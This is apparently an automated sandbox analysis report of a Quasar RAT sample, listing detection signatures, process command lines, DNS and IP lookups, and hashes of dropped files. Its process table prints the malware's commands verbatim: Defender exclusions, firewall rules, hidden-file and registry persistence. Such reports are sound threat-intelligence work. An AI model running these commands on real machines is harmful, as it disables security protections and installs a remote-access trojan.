Analysis Overview
SHA256
231a7780f0f4272deb756c57250382671a1a8f723730a3ad5ceb7f7fd1e600cd
Threat Level: Known bad
The file 231a7780f0f4272deb756c57250382671a1a8f723730a3ad5ceb7f7fd1e600cd was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Modifies Windows Firewall
ACProtect 1.3x - 1.4x DLL software
Unexpected DNS network traffic destination
Loads dropped DLL
UPX packed file
Executes dropped EXE
Looks up external IP address via web service
Enumerates physical storage devices
Unsigned PE
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-01 07:53
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-01 07:53
Reported
2023-08-01 07:55
Platform
win10-20230703-en
Max time kernel
39s
Max time network
155s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7z.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7z.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes

| Image | Command line |
| --- | --- |
| C:\Users\Admin\AppData\Local\Temp\231a7780f0f4272deb756c57250382671a1a8f723730a3ad5ceb7f7fd1e600cd.exe | "C:\Users\Admin\AppData\Local\Temp\231a7780f0f4272deb756c57250382671a1a8f723730a3ad5ceb7f7fd1e600cd.exe" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" " |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com |
| C:\Windows\SysWOW64\nslookup.exe | nslookup myip.opendns.com. resolver1.opendns.com |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic ComputerSystem get Domain |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"' |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"' |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"' |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"' |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"' |
| C:\Users\Admin\AppData\Local\Temp\7z.exe | 7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1 |
| C:\Windows\SysWOW64\netsh.exe | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes |
| C:\Windows\SysWOW64\netsh.exe | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic computersystem where name="CXVLSGIX" set AutomaticManagedPagefile=False |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000 |
| C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe | "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" |
| C:\Windows\SysWOW64\attrib.exe | "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" |
| C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F |
| C:\Users\Admin\AppData\Local\Temp\ratt.exe | "ratt.exe" |
| C:\Windows\SysWOW64\cmd.exe | "cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe," |
| C:\Windows\SysWOW64\PING.EXE | ping 127.0.0.1 -n 7 |
| C:\Windows\SysWOW64\cmd.exe | "cmd" /c ping 127.0.0.1 -n 13 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 13 > nul && "C:\Users\Admin\Music\rot.exe" |
| C:\Windows\SysWOW64\PING.EXE | ping 127.0.0.1 -n 13 |
| C:\Windows\SysWOW64\reg.exe | REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe," |
| C:\Windows\SysWOW64\cmd.exe | "cmd" /c ping 127.0.0.1 -n 10 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 10 > nul && "C:\Users\Admin\Music\rot.exe" |
| C:\Windows\SysWOW64\PING.EXE | ping 127.0.0.1 -n 10 |
| C:\Windows\SysWOW64\PING.EXE | ping 127.0.0.1 -n 10 |
| C:\Users\Admin\Music\rot.exe | "C:\Users\Admin\Music\rot.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" |
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 222.222.67.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.148.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\ratt.bat
| Hash | Value |
| --- | --- |
| MD5 | 7ea1fec84d76294d9256ae3dca7676b2 |
| SHA1 | 1e335451d1cbb6951bc77bf75430f4d983491342 |
| SHA256 | 9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940 |
| SHA512 | ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317 |
memory/4732-139-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4732-140-0x0000000000860000-0x0000000000896000-memory.dmp
memory/4732-141-0x0000000000D80000-0x0000000000D90000-memory.dmp
memory/4732-142-0x0000000000D80000-0x0000000000D90000-memory.dmp
memory/4732-143-0x0000000006FB0000-0x00000000075D8000-memory.dmp
memory/4732-144-0x0000000006AF0000-0x0000000006B12000-memory.dmp
memory/4732-145-0x0000000006C70000-0x0000000006CD6000-memory.dmp
memory/4732-146-0x0000000006DE0000-0x0000000006E46000-memory.dmp
memory/4732-147-0x00000000075E0000-0x0000000007930000-memory.dmp
memory/4732-148-0x0000000006F10000-0x0000000006F2C000-memory.dmp
memory/4732-149-0x0000000006F30000-0x0000000006F7B000-memory.dmp
memory/4732-150-0x0000000007C20000-0x0000000007C96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_00agyxkz.qks.ps1
| Hash | Value |
| --- | --- |
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4732-162-0x0000000000D80000-0x0000000000D90000-memory.dmp
memory/4732-161-0x0000000000D80000-0x0000000000D90000-memory.dmp
memory/4732-166-0x0000000073B10000-0x00000000741FE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| Hash | Value |
| --- | --- |
| MD5 | 0f5cbdca905beb13bebdcf43fb0716bd |
| SHA1 | 9e136131389fde83297267faf6c651d420671b3f |
| SHA256 | a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060 |
| SHA512 | a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0 |
memory/3368-169-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/3368-171-0x0000000000E50000-0x0000000000E60000-memory.dmp
memory/3368-172-0x0000000000E50000-0x0000000000E60000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | 8eb4b5fe8ece688db99d9a2054fdd4e4 |
| SHA1 | 04f747cf6d7e6b217bafc5d9d31d17acc17db338 |
| SHA256 | 705482878f52a44038f01f1c749d78a9dda820d4e777f51f24ec7b1b98847e1d |
| SHA512 | eac888713a1fd5af628ab1b32fc6bb923556e5e7aa60abfd81a5f9d65d4f483c19cb6637daa996eb1d25079fa13edf65a247e017d87bb1c63ff31f71c47f69d1 |
memory/3368-187-0x0000000000E50000-0x0000000000E60000-memory.dmp
memory/3368-184-0x0000000000E50000-0x0000000000E60000-memory.dmp
memory/164-190-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/164-192-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/164-191-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | 29f4d502620669d407e900b85bf3a712 |
| SHA1 | cb349cf1b89d46e7469ba6d382330495a568de14 |
| SHA256 | 4ff3b122b0ff6f104b788e9b3306cbb7b75bdfc2d6d02de913851d9baac37964 |
| SHA512 | da68c95e14cbacde6cb9da13179d74213a609b8b007cfd73e31f70458d9b2f58ea751af6ad0e1ff477fe0ca62a358c28e0f1469e5136c2394c8412021bff6c36 |
memory/164-205-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/164-204-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/164-209-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/3368-208-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/3224-213-0x00000000050C0000-0x00000000050D0000-memory.dmp
memory/3224-214-0x00000000050C0000-0x00000000050D0000-memory.dmp
memory/3224-212-0x0000000073B10000-0x00000000741FE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | 86333d64abc358a57f4f84e6c33987ad |
| SHA1 | 5c54cfbf251581a7b463bd376739706614252cf5 |
| SHA256 | a63850416bd62726b5e6fb1b2d13d9a231a2d4249b2021644fb663b3082abd7b |
| SHA512 | 707fc374ec1f1920ea0be4b1883b85c9a621985252d9040d6f6ed19fae9eca410ccc7de44dc098d53bfc2135d755d6d7ebb3270893496d50aa1e96a24a9f6065 |
memory/3224-226-0x00000000050C0000-0x00000000050D0000-memory.dmp
memory/3224-229-0x00000000050C0000-0x00000000050D0000-memory.dmp
memory/3224-230-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/2996-234-0x0000000007360000-0x0000000007370000-memory.dmp
memory/2996-235-0x0000000007360000-0x0000000007370000-memory.dmp
memory/2996-233-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/2996-236-0x00000000082D0000-0x0000000008620000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | b6a1ec0d626f652a291ec62b3ea3dc08 |
| SHA1 | e896e7b7523c80d6fcd97274449fbf2b8ae23da2 |
| SHA256 | ed225ad4a6fdb507a3463513741ca325088f89f3f8fdfa394fe1679cbaeb56f3 |
| SHA512 | e2cbed9fb8b9598205e5b248c3721f548b22084f9a831553a089fd0a9257b65ee41dbc13e2605dbe2d48384402a7ebcdc1151f31f4900f62ec744c8c54105bd0 |
memory/2996-248-0x0000000007360000-0x0000000007370000-memory.dmp
memory/2996-249-0x0000000007360000-0x0000000007370000-memory.dmp
memory/2996-252-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4348-255-0x0000000000400000-0x0000000000432000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7z.exe
| Hash | Value |
| --- | --- |
| MD5 | 8ba2e41b330ae9356e62eb63514cf82e |
| SHA1 | 8dc266467a5a0d587ed0181d4344581ef4ff30b2 |
| SHA256 | ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea |
| SHA512 | 2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d |
C:\Users\Admin\AppData\Local\Temp\7z.dll
| Hash | Value |
| --- | --- |
| MD5 | 15bbbe562f9be3e5dcbb834e635cc231 |
| SHA1 | 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a |
| SHA256 | ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde |
| SHA512 | 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287 |
\Users\Admin\AppData\Local\Temp\7z.dll
| Hash | Value |
| --- | --- |
| MD5 | 15bbbe562f9be3e5dcbb834e635cc231 |
| SHA1 | 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a |
| SHA256 | ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde |
| SHA512 | 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287 |
memory/4348-259-0x0000000010000000-0x00000000100E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.7z
| Hash | Value |
| --- | --- |
| MD5 | 7de6fdf3629c73bf0c29a96fa23ae055 |
| SHA1 | dcb37f6d43977601c6460b17387a89b9e4c0609a |
| SHA256 | 069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff |
| SHA512 | d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8 |
memory/4348-263-0x0000000000400000-0x0000000000432000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| Hash | Value |
| --- | --- |
| MD5 | de0b5ab575ece81f5783b326a5bd4d14 |
| SHA1 | 6c76b4fab946d26ac0bdf4442015e2767a5cb7d6 |
| SHA256 | bd0a33c8b5478b4c8b75738018f25d76cbe3e7e81747454c38d8681f47ba2ac5 |
| SHA512 | 147267776f00284d733fd03f6037459b7f9b955754681d2c0cdba3c4c4ec857fb11f024731c1a24961d4e487149c58b8292439aa3c78360d1907b0197d654e88 |
memory/3184-269-0x0000000073A40000-0x000000007412E000-memory.dmp
memory/3184-270-0x0000000007B50000-0x0000000007EA0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | 99994b78ff6554cc641133ddc99ea3b7 |
| SHA1 | 47ef8cdcf30438d0202f5b0d22fe6579e6c32ccb |
| SHA256 | 7424305f5007f7d45da44079d39a654f180f566946b8786598caa631fb8f9deb |
| SHA512 | ea4f45c238931cce030858f9d72e053ee0eaf3549ea5e6b0dbff037bdaced3df79562913f098c32846303890784fee9925c30df3db7f1eaca53ff36114a56f28 |
memory/3184-272-0x00000000081B0000-0x00000000081FB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Add.ps1
| Hash | Value |
| --- | --- |
| MD5 | 0df43097e0f0acd04d9e17fb43d618b9 |
| SHA1 | 69b3ade12cb228393a93624e65f41604a17c83b6 |
| SHA256 | c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873 |
| SHA512 | 01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb |
memory/3184-294-0x0000000009620000-0x0000000009653000-memory.dmp
memory/3184-295-0x0000000009170000-0x000000000918E000-memory.dmp
memory/3184-300-0x0000000009660000-0x0000000009705000-memory.dmp
memory/3184-301-0x0000000073A40000-0x000000007412E000-memory.dmp
memory/3184-302-0x0000000006DE0000-0x0000000006DF0000-memory.dmp
memory/3184-303-0x0000000009870000-0x0000000009904000-memory.dmp
memory/3184-496-0x0000000009790000-0x00000000097AA000-memory.dmp
memory/3184-501-0x0000000009770000-0x0000000009778000-memory.dmp
memory/3184-527-0x000000000A010000-0x000000000A688000-memory.dmp
memory/3184-528-0x00000000097F0000-0x000000000980A000-memory.dmp
memory/3184-533-0x0000000006DE0000-0x0000000006DF0000-memory.dmp
memory/3184-534-0x0000000009940000-0x0000000009962000-memory.dmp
memory/3184-535-0x000000000A690000-0x000000000AB8E000-memory.dmp
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
| Hash | Value |
| --- | --- |
| MD5 | 69d3b004b17f53fcf6c7bdec1ba205b4 |
| SHA1 | 9ff86401704c40db5c2f420a836fda94fd58fb33 |
| SHA256 | c8143283ff7c01d2660550f1b9db1b2c0b739abda8d7e0ca52cc17ffdd4a67e1 |
| SHA512 | 90fa78e6a7ad37a1d02ccc74655c772997d91c1f315d58c9134b60c2baacb11c5c5bd2d7ac03e3135abf30575223a1ace30f7432fcc075675d999f27a2abe247 |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe
| Hash | Value |
| --- | --- |
| MD5 | 0c8fb1b6e6ad1b3584dc37055ed61714 |
| SHA1 | d02394d2602126807a8c65796e78bc1f3fb5934d |
| SHA256 | 6a7d4a057b43728adfc4a1f48f0569fca03dc435af1d6358f9312371b78618a5 |
| SHA512 | 9ebf1ab639a78a363cf3bf5b22c6a016ec11acd6ec05954a5673aeec48e8e9ee45b0157677dbbb42baf70caaea59070785083644065e6e88909a85d1e0008642 |
memory/2980-564-0x00000000012E0000-0x0000000001496000-memory.dmp
memory/2980-566-0x0000000073A40000-0x000000007412E000-memory.dmp
memory/2980-568-0x0000000001230000-0x00000000012CC000-memory.dmp
memory/2980-579-0x0000000004BE0000-0x0000000004C72000-memory.dmp
memory/2980-582-0x0000000004E10000-0x0000000004E20000-memory.dmp
memory/2980-587-0x00000000010F0000-0x0000000001136000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| Hash | Value |
| --- | --- |
| MD5 | 52c44527220c480a60afa4868c7a1f3a |
| SHA1 | d7cf76fbcc72748ad1ecb7018859a1766b9e6853 |
| SHA256 | a36bda0ca72032e6d105cea26cb877ef3a1deb3275d5cb86cad249e544508711 |
| SHA512 | 30c801f73e2deb4910911fcf2fb2d0fd6d6bc8b8504499bb4c61603c7974ae722782be53d5eb9e36adc86881b245d2e6e1a8c98176de8bceca13e29ebddf2751 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ratt.exe.log
| Hash | Value |
| --- | --- |
| MD5 | 9e104e9aa0cfdec0753de24cbe3f587b |
| SHA1 | f63b8d0b29c65e518be6a9412e7499c9de11be78 |
| SHA256 | 59a9f13de0e003ea4adcd0193477f147b0c91ae847eebc744e91a4efe167223f |
| SHA512 | 8253854159ceac2d84eb371c9672730831505dea52ac3bc2cca45ee5308717ca3f11734602d0a409974b137084a8c20e6b7653640991e45708f692c65ac4933b |
C:\Users\Admin\Music\rot.exe
| Hash | Value |
| --- | --- |
| MD5 | ef4cebe5c1b9c6a442ce9eb8a4eec768 |
| SHA1 | d68b82c4f397e0e9d4d6d1841b0eb1b7e121de04 |
| SHA256 | cbba13cc9e5b83f005ac76bb1d323bf203ec0127ae9f3a4f9236731542a88f17 |
| SHA512 | 05779e0f129f7bf29f1bdedffdc90428091c2ae4d45202a3ea05c2b6506bf2d9ca7f728d68900e84385eeeb6548872078972ddac2cdaae6fe59a14165489b577 |
C:\Users\Admin\Music\rot.exe
| Hash | Value |
| --- | --- |
| MD5 | bdcba88782a4742768d5ab4d60547bab |
| SHA1 | 3f7c30a403c125e1273a2c6e192bedcb926f8381 |
| SHA256 | a3ea0b8c4f098acdbd91f000c5cc14da7ef3ce1fbe309e67ff075b77717a721b |
| SHA512 | c88166f2fb11e6658518f523654f1064f506e7e527f1d4696dfb94a927b199f96e37ad684c353a746fe76416733d9837fb48e362ce62f1d899c30fa51e3d05e0 |
C:\Users\Admin\Music\rot.exe
| Hash | Value |
| --- | --- |
| MD5 | 473cc1b1447348238ba0fd113985428b |
| SHA1 | d6ff35f73959812faa85ec413fee34ad784d6498 |
| SHA256 | 77447c86996900f6c62381e05c84f3c80152cbad9d83fc2c26e2b44d3035c98e |
| SHA512 | b25de688f3dc1a86b9a2b68a289369e6c5b008ce4efdb7fad43d0822ce9fb8412a33839260fef2c61dabcaaffbe2dbf1eb50f4b37c6f9f8f90f3c41079fdd43d |
memory/2192-617-0x0000000000400000-0x000000000045E000-memory.dmp